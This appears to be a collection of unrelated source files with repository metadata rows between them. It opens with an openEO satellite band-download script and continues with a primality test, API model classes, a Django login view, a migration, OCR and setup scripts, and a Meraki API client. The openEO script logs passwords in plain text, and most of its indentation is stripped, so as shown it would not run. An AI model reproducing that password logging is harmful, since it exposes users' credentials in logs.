all_bands -- Bands -- 45/User String -- AOT B02 B03 B04 B05 B06 B07 B8A B11 B12 SCL VIS WVP CLD SNW
bands -- Bands -- 45/User String -- B03 B11
band_format -- Band Format -- 45/User String -- gtiff
bbox_string -- BBox -- 45/User String -- 10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755
temporal_extent -- Temporal Extent -- 44/DateRange -- 2016-06-28T00:00:00.000Z/2016-06-28T00:00:00.000Z
Outputs:
band_dir -- Band Directory -- 45/User String
band_files -- Band Files -- 45/User String
Main Dependency:
python-3
Software Dependencies:
openeo-0.4
Processing Resources:
ram -- 1
disk -- 10
cpu -- 1
"""
all_bands = all_bands.split()
bands = bands.split()
temporal_extent = temporal_extent.split("/")
west, south, east, north = list(map(lambda value: value.strip(), bbox_string.split(",")))
bbox = {"west": west, "east": east, "south": south, "north": north, "crs": "EPSG:4326"}
logger.info("Demo user:password: %s:%s", user, password)
logger.info("Provider: %s with driver URL %s", provider, driver_url)
logger.info("Image Collection: %s", image_collection)
logger.info("Bands: %s", bands)
logger.info("Using BBox in str format - raw input (west, south, east, north): %s", bbox_string)
logger.info("BBox: %s", bbox)
logger.info("Temporal extent in string format start/end: %s", temporal_extent)
connection = openeo.connect(driver_url)
connection.authenticate_basic(user, password)
logger.info(
"describe_collection('%s'):\n %s\n",
image_collection,
json.dumps(connection.describe_collection(image_collection), indent=2),
)
cube = ImageCollectionClient.load_collection(session = connection, collection_id = image_collection, bands = all_bands)
    cube = cube.filter_bbox(**bbox)
cube = cube.filter_temporal(extent=temporal_extent)
logger.info("cube.graph: \n%s\n", json.dumps(cube.graph, indent=2))
logger.info("File Format: %s", band_format)
logger.info(
"File Name Format: {provider}.{image_collection}.{west}.{south}.{east}.{north}."
"{temporal_extent[0]}.{temporal_extent[1]}.B{band.zfill(2)}.{band_format}"
)
band_dir = out_dir
logger.info("Downloading bands in %s", out_dir)
band_files = []
for band in bands:
cube_band = cube.band(band)
band_file = (
f"{provider}.{image_collection}.{west}.{south}.{east}.{north}."
f"{temporal_extent[0]}.{temporal_extent[1]}.B{band.zfill(2)}.{band_format.lower()}"
)
logger.info("Downloading band %s: %s", band, band_file)
band_path = f"{out_dir}/{band_file}"
band_files.append(band_file)
logger.info("Starting download at %s", datetime.now())
cube_band.download(band_path, format=band_format)
logger.info("Download finished for band %s at %s", band, datetime.now())
logger.info("Downloads finished at %s", datetime.now())
return {"band_dir": band_dir, "band_files": band_files}
def example():
execute(
out_dir="/tmp",
user="guest",
password="guest_123",
provider="Eurac Research",
driver_url="https://openeo.eurac.edu",
        image_collection="S2_L2A_T32TPS_20M",
        all_bands="AOT B02 B03 B04 B05 B06 B07 B8A B11 B12 SCL VIS WVP CLD SNW",  # required by execute(); value from the docstring defaults
        bands="B03 B11",
band_format="gtiff",
# Rumst bbox w,s,e,n
bbox_string="10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755",
temporal_extent="2016-06-28/2016-06-28",
)
if __name__ == "__main__":
# Configure logger to add output to stdout/stderr
formatter = logging.Formatter(fmt="%(levelname)s - %(message)s")
handlers = [logging.StreamHandler()]
for handler in handlers:
handler.setFormatter(formatter)
level = logging.getLevelName(logging.DEBUG)
logger.setLevel(level)
for handler in handlers:
logger.addHandler(handler)
# called from process_wrapper.py
# py3_process_wrapper.py out_dir /tmp user eopen ...
kwargs = {var: value for var, value in list(zip(*[sys.argv[i + 1 :: 2] for i in (0, 1)]))}
logger.debug("kwargs from sys.argv: \n %s", kwargs)
print(execute(**kwargs))
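The __main__ block above reads argv as alternating key/value tokens: sys.argv[1::2] are the parameter names and sys.argv[2::2] their values, which zip pairs up into kwargs. A sketch of the equivalent call (values are the demo defaults from example()):

# python py3_process_wrapper-wcps_eurac.py \
#     out_dir /tmp user guest password guest_123 \
#     provider "Eurac Research" driver_url https://openeo.eurac.edu ...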
| 35.944444
| 123
| 0.656685
|
4a18a3a20fc8d0ccb52c0c5ee1da5be156d39bb8
| 916
|
py
|
Python
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 9
|
2018-11-30T18:53:54.000Z
|
2021-11-15T20:59:08.000Z
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 13
|
2018-11-30T00:13:49.000Z
|
2019-04-04T20:14:29.000Z
|
misc/primality.py
|
computablelabs/starks
|
f8e45d56c3934a1cf24220b58e073434379e3d78
|
[
"MIT"
] | 1
|
2020-05-14T20:35:48.000Z
|
2020-05-14T20:35:48.000Z
|
import random
def decompose(n):
exponentOfTwo = 0
while n % 2 == 0:
n = n // 2 # using / turns large numbers into floats
exponentOfTwo += 1
return exponentOfTwo, n
def isWitness(possibleWitness, p, exponent, remainder):
if pow(possibleWitness, remainder, p) == 1:
return False
if any(
pow(possibleWitness, 2**i * remainder, p) == p - 1
for i in range(exponent)):
return False
return True
def probablyPrime(p, accuracy=100):
if p == 2 or p == 3:
return True
if p < 2 or p % 2 == 0:
return False
exponent, remainder = decompose(p - 1)
for _ in range(accuracy):
possibleWitness = random.randint(2, p - 2)
if isWitness(possibleWitness, p, exponent, remainder):
return False
return True
if __name__ == "__main__":
n = 1
while not probablyPrime(n, accuracy=100):
n = random.getrandbits(512)
print("{} is prime".format(n))
| 18.693878
| 58
| 0.635371
|
4a18a410ef7581108c9ea426a1017cdf8f72c301
| 13,268
|
py
|
Python
|
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
deutschland/autobahn/model/display_type.py
|
kiranmusze/deutschland
|
86d8ead3f38ad88ad66bb338b9f5a8db06992344
|
[
"Apache-2.0"
] | null | null | null |
"""
Autobahn App API
    What's happening on Germany's federal highways? API for current administrative data on roadworks, traffic jams and charging stations. Also provides access to traffic surveillance cameras and many other datasets. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from deutschland.autobahn.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from deutschland.autobahn.exceptions import ApiAttributeError
class DisplayType(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
          and for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("value",): {
"ROADWORKS": "ROADWORKS",
"WEBCAM": "WEBCAM",
"PARKING": "PARKING",
"WARNING": "WARNING",
"WEIGHT_LIMIT_35": "WEIGHT_LIMIT_35",
"CLOSURE": "CLOSURE",
"CLOSURE_ENTRY_EXIT": "CLOSURE_ENTRY_EXIT",
"STRONG_ELECTRIC_CHARGING_STATION": "STRONG_ELECTRIC_CHARGING_STATION",
"SHORT_TERM_ROADWORKS": "SHORT_TERM_ROADWORKS",
"ELECTRIC_CHARGING_STATION": "ELECTRIC_CHARGING_STATION",
},
}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"value": (str,),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""DisplayType - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
Keyword Args:
value (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop("_path_to_item", ())
if "value" in kwargs:
value = kwargs.pop("value")
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments."
% (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""DisplayType - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
Keyword Args:
value (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop("_path_to_item", ())
self = super(OpenApiModel, cls).__new__(cls)
if "value" in kwargs:
value = kwargs.pop("value")
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments."
% (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self
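A minimal construction sketch (the import path follows this file's location in the package; values outside allowed_values are rejected during attribute validation):

from deutschland.autobahn.model.display_type import DisplayType

dt = DisplayType("ROADWORKS")
print(dt.value)                 # -> ROADWORKS
# DisplayType("NOT_A_TYPE") would fail the allowed-values check instead.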
| 42.8
| 245
| 0.565722
|
4a18a4f456978222d0e767fdd9580d91e41bc2fe
| 749
|
py
|
Python
|
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.contrib.auth import authenticate
from rest_framework import permissions
from rest_framework.authtoken.models import Token
from rest_framework.views import APIView
from rest_framework.response import Response
def index(request, *args):
return render(request, 'index.html')
class LoginView(APIView):
permission_classes = [permissions.AllowAny, ]
def post(self, request, *args, **kwargs):
data = request.data
user = authenticate(username=data.get('username'), password=data.get('password'))
if user:
token, _ = Token.objects.get_or_create(user=user)
return Response({'token': token.key}, status=200)
return Response(status=400)
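A client-side sketch of the token flow; the URL '/api/login/' is an assumption, since the project's urls.py is not shown here.

import requests

resp = requests.post(
    "http://localhost:8000/api/login/",  # hypothetical route to LoginView
    data={"username": "alice", "password": "s3cret"},
)
if resp.status_code == 200:
    token = resp.json()["token"]
    # Subsequent requests authenticate via DRF's TokenAuthentication header.
    headers = {"Authorization": "Token " + token}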
| 28.807692
| 89
| 0.719626
|
4a18a5a607af1346aa084f6f889041c04aef1398
| 793
|
py
|
Python
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 7
|
2017-09-04T10:24:02.000Z
|
2019-12-02T13:12:30.000Z
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 140
|
2017-09-06T07:02:18.000Z
|
2022-02-26T01:26:25.000Z
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 2
|
2017-09-13T16:42:57.000Z
|
2018-02-15T15:32:40.000Z
|
"""Add 'tos_approved_at' to User.
Revision ID: 7f3f1a931278
Revises: b984311d26d7
Create Date: 2017-11-29 14:42:23.349903
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '7f3f1a931278'
down_revision = 'b984311d26d7'
branch_labels = None
depends_on = None
def upgrade():
"""Add 'users.tos_approved_at' column."""
with op.batch_alter_table('users', schema=None) as batch_op:
batch_op.add_column(sa.Column('tos_approved_at', sa.DateTime(), nullable=True))
def downgrade():
"""Drop 'users.tos_approved_at' column."""
with op.batch_alter_table('users', schema=None) as batch_op:
batch_op.drop_column('tos_approved_at')
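Note the batch_alter_table context: it keeps the migration working on SQLite, which cannot alter columns in place. Applying it is typically one of the following (hedged, depending on whether the project drives Alembic directly or through Flask-Migrate):

# flask db upgrade                  # Flask-Migrate layout (migrations/versions)
# alembic upgrade 7f3f1a931278      # plain Alembic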
| 25.580645
| 87
| 0.742749
|
4a18a66b29336cbe105ce2a8ce389b140fda4dbb
| 1,997
|
py
|
Python
|
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from PIL import Image
from vietocr.tool.predictor import Predictor
from vietocr.tool.config import Cfg
import os
import time
# python predict_seq2seq.py --config logs/hw_word_seq2seq_finetuning_170k_v2/config.yml --weight logs/hw_word_seq2seq_finetuning_170k_v2/best.pt --img image
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='./logs/hw_word_seq2seq/config.yml')
parser.add_argument('--weight', type=str, default='./logs/hw_word_seq2seq/best.pt')
parser.add_argument('--img', type=str, default=None, required=True)
args = parser.parse_args()
config = Cfg.load_config_from_file(args.config, download_base=False)
    config['weights'] = args.weight
print(config.pretty_text())
detector = Predictor(config)
if os.path.isdir(args.img):
img_paths = os.listdir(args.img)
for img_path in img_paths:
            try:
                img = Image.open(os.path.join(args.img, img_path))
            except Exception:
                # skip directory entries that cannot be opened as images
                continue
t1 = time.time()
s, prob = detector.predict(img, return_prob=True)
print('Text in {} is:\t {} | prob: {:.2f} | times: {:.2f}'.format(img_path, s, prob, time.time() - t1))
else:
t1 = time.time()
img = Image.open(args.img)
s, prob = detector.predict(img, return_prob=True)
print('Text in {} is:\t {} | prob: {:.2f} | times: {:.2f}'.format(args.img, s, prob, time.time() - t1))
def predict_file():
config_path = './logs/hw_word_seq2seq/config.yml'
config = Cfg.load_config_from_file(config_path, download_base=False)
    config['weights'] = './logs/hw_word_seq2seq_finetuning/best.pt'
print(config.pretty_text())
detector = Predictor(config)
detector.gen_annotations('./DATA/data_verifier/hw_word_15k_labels.txt', './DATA/data_verifier/hw_word_15k_labels_preds.txt', data_root='./DATA/data_verifier')
if __name__ == '__main__':
main()
# predict_file()
| 35.035088
| 162
| 0.664497
|
4a18a6ab4cce67f35a5b14cf60dc5cbd747a165b
| 601
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Driving_to, obj[1]: Passanger, obj[2]: Weather, obj[3]: Temperature, obj[4]: Time, obj[5]: Coupon, obj[6]: Coupon_validity, obj[7]: Gender, obj[8]: Age, obj[9]: Maritalstatus, obj[10]: Children, obj[11]: Education, obj[12]: Occupation, obj[13]: Income, obj[14]: Bar, obj[15]: Coffeehouse, obj[16]: Carryaway, obj[17]: Restaurantlessthan20, obj[18]: Restaurant20to50, obj[19]: Direction_same, obj[20]: Distance
# {"feature": "Age", "instances": 3, "metric_value": 0.9183, "depth": 1}
if obj[8]<=1:
return 'False'
elif obj[8]>1:
return 'True'
else: return 'True'
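# --- Hedged usage sketch (not part of the generated rule). obj is the
# 21-element feature vector documented in the comment above; placeholder
# zeros everywhere, with obj[8] (Age) set to 2 so the Age > 1 branch fires.
sample = [0] * 21
sample[8] = 2
print(findDecision(sample))  # -> 'True'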
| 75.125
| 441
| 0.673877
|
4a18a6d316f050d5bea5eb2e112365946cab0c4a
| 438
|
py
|
Python
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 418
|
2017-10-05T05:52:49.000Z
|
2022-03-24T09:50:06.000Z
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 1,049
|
2017-09-16T09:34:55.000Z
|
2022-03-23T16:13:04.000Z
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 155
|
2017-10-16T18:32:01.000Z
|
2022-03-15T12:48:33.000Z
|
# Generated by Django 3.1.4 on 2020-12-13 23:27
from django.db import migrations
import i18nfield.fields
class Migration(migrations.Migration):
dependencies = [
("event", "0024_remove_team_review_override_votes"),
]
operations = [
migrations.AddField(
model_name="event",
name="featured_sessions_text",
field=i18nfield.fields.I18nTextField(null=True),
),
]
| 21.9
| 60
| 0.641553
|
4a18a6f27874470db17d86c7136f3e2e3bed1715
| 662
|
py
|
Python
|
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | 1
|
2021-09-07T09:29:42.000Z
|
2021-09-07T09:29:42.000Z
|
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name="tap-rockgympro",
version="0.1.12",
description="Singer.io tap for extracting RockGymPro data",
author="Cinch",
url="https://github.com/cinchio/tap-rockgympro",
python_requires='>=3.6.0',
py_modules=["tap_rockgympro"],
install_requires=[
"singer-python==5.12.1"
],
entry_points="""
[console_scripts]
tap-rockgympro=tap_rockgympro:main
""",
packages=find_packages(include=['tap_rockgympro', 'tap_rockgympro.*']),
package_data = {
"tap_rockgympro": ["schemas/*.json"]
},
include_package_data=True,
)
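# --- Hedged note (not part of the original setup.py): the console_scripts
# entry point wires the `tap-rockgympro` command to tap_rockgympro:main, so
# after `pip install .` the tap runs like any Singer tap, e.g.
#   tap-rockgympro --config config.json
# (the config file name above is an assumption, not taken from this record).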
| 25.461538
| 75
| 0.652568
|
4a18a872418974b52f171ee850e95b0eea4b0dec
| 9,621
|
py
|
Python
|
meraki/api/organizations.py
|
NoFliesOnYou/dashboard-api-python
|
3185d0e8a9a38eba9127ac640dcbb02444e7adf2
|
[
"MIT"
] | null | null | null |
meraki/api/organizations.py
|
NoFliesOnYou/dashboard-api-python
|
3185d0e8a9a38eba9127ac640dcbb02444e7adf2
|
[
"MIT"
] | 3
|
2020-11-08T08:50:59.000Z
|
2021-12-13T20:47:15.000Z
|
flask/meraki/api/organizations.py
|
cyberdevnet/mer-hacker
|
a7dddd03c5b02a2f8c84d711b69868d2b94f1f99
|
[
"MIT"
] | null | null | null |
class Organizations(object):
def __init__(self, session):
super(Organizations, self).__init__()
self._session = session
def getOrganizations(self):
"""
**List the organizations that the user has privileges on**
https://developer.cisco.com/meraki/api/#!get-organizations
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizations',
}
resource = f'/organizations'
return self._session.get(metadata, resource)
def createOrganization(self, name: str):
"""
**Create a new organization**
https://developer.cisco.com/meraki/api/#!create-organization
- name (string): The name of the organization
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'createOrganization',
}
resource = f'/organizations'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def getOrganization(self, organizationId: str):
"""
**Return an organization**
https://developer.cisco.com/meraki/api/#!get-organization
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganization',
}
resource = f'/organizations/{organizationId}'
return self._session.get(metadata, resource)
def updateOrganization(self, organizationId: str, **kwargs):
"""
**Update an organization**
https://developer.cisco.com/meraki/api/#!update-organization
- organizationId (string)
- name (string): The name of the organization
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'updateOrganization',
}
resource = f'/organizations/{organizationId}'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.put(metadata, resource, payload)
def deleteOrganization(self, organizationId: str):
"""
**Delete an organization**
https://developer.cisco.com/meraki/api/#!delete-organization
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'deleteOrganization',
}
resource = f'/organizations/{organizationId}'
return self._session.delete(metadata, resource)
def claimIntoOrganization(self, organizationId: str, **kwargs):
"""
**Claim a list of devices, licenses, and/or orders into an organization. When claiming by order, all devices and licenses in the order will be claimed; licenses will be added to the organization and devices will be placed in the organization's inventory.**
https://developer.cisco.com/meraki/api/#!claim-into-organization
- organizationId (string)
- orders (array): The numbers of the orders that should be claimed
- serials (array): The serials of the devices that should be claimed
- licenses (array): The licenses that should be claimed
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'claimIntoOrganization',
}
resource = f'/organizations/{organizationId}/claim'
body_params = ['orders', 'serials', 'licenses']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def cloneOrganization(self, organizationId: str, name: str):
"""
**Create a new organization by cloning the addressed organization**
https://developer.cisco.com/meraki/api/#!clone-organization
- organizationId (string)
- name (string): The name of the new organization
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'cloneOrganization',
}
resource = f'/organizations/{organizationId}/clone'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def getOrganizationDeviceStatuses(self, organizationId: str):
"""
**List the status of every Meraki device in the organization**
https://developer.cisco.com/meraki/api/#!get-organization-device-statuses
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationDeviceStatuses',
}
resource = f'/organizations/{organizationId}/deviceStatuses'
return self._session.get(metadata, resource)
def getOrganizationInventory(self, organizationId: str, **kwargs):
"""
**Return the inventory for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-inventory
- organizationId (string)
- includeLicenseInfo (boolean): When this parameter is true, each entity in the response will include the license expiration date of the device (if any). Only applies to organizations that support per-device licensing. Defaults to false.
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationInventory',
}
resource = f'/organizations/{organizationId}/inventory'
query_params = ['includeLicenseInfo']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get(metadata, resource, params)
def getOrganizationLicenseState(self, organizationId: str):
"""
**Return an overview of the license state for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-license-state
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationLicenseState',
}
resource = f'/organizations/{organizationId}/licenseState'
return self._session.get(metadata, resource)
def getOrganizationThirdPartyVPNPeers(self, organizationId: str):
"""
**Return the third party VPN peers for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-third-party-v-p-n-peers
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationThirdPartyVPNPeers',
}
resource = f'/organizations/{organizationId}/thirdPartyVPNPeers'
return self._session.get(metadata, resource)
def updateOrganizationThirdPartyVPNPeers(self, organizationId: str, peers: list):
"""
**Update the third party VPN peers for an organization**
https://developer.cisco.com/meraki/api/#!update-organization-third-party-v-p-n-peers
- organizationId (string)
- peers (array): The list of VPN peers
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'updateOrganizationThirdPartyVPNPeers',
}
resource = f'/organizations/{organizationId}/thirdPartyVPNPeers'
body_params = ['peers']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.put(metadata, resource, payload)
def getOrganizationUplinksLossAndLatency(self, organizationId: str, **kwargs):
"""
**Return the uplink loss and latency for every MX in the organization from at latest 2 minutes ago**
https://developer.cisco.com/meraki/api/#!get-organization-uplinks-loss-and-latency
- organizationId (string)
